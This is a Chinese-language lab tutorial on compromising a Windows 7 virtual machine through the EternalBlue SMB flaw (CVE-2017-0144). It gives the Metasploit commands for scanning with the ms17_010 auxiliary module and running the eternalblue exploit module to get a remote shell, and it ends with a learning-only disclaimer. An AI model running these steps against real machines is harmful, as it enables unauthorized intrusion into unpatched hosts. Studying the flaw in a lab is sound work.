一、准备工作:
1、资源准备:
环境(两台虚拟机):
攻击机(kali 2020):192.168.99.131
目标机(win7):192.168.99.128,含有(CVE-2017-0144 )漏洞。
2、通信准备:需要让攻击机与目标机能够相互通信(ping通),如果无法ping通可以如下设置。
准备好之后就可以正式开始了。
二、开始入侵:
步骤:开启metaspolit应用→查找漏洞辅助模块→使用漏洞辅助模块→设置允许辅助模块参数→执行辅助模块检测是否成功→查找漏洞利用模块→使用漏洞利用模块→设置漏洞利用模块参数→执行入侵→庆祝
1、开启metaspolit应用:
一般要先开启 数据库service postgresql status
service postgresql restart
如果报错的话,就初始化一下数据库msfdb init
之后再重新打开
2、查找漏洞利用辅助模块(Auxiliaries):search ms17_010
3、使用漏洞辅助模块:use auxiliary/scanner/smb/smb_ms17_010
4、设置辅助模块参数:show options
5、执行检测辅助模块是否利用成功:run
6、查找漏洞利用模块(Exploit):search ms17_010
7、使用漏洞利用模块:use exploit/windows/smb/ms17_010_eternalblue
8、设置漏洞利用模块参数:show options
9、执行漏洞入侵:run
10、庆祝:输入ipconfig检查是否入侵成功。
三、庆祝入侵成功:
至此你已成功入侵目标机DOS,你可以通过DOS界面使劲玩耍了。
四、说明:本教程仅提供学习参考,演示机器都为虚拟机。请勿违法入侵他人电脑,产生一切违法行为自负。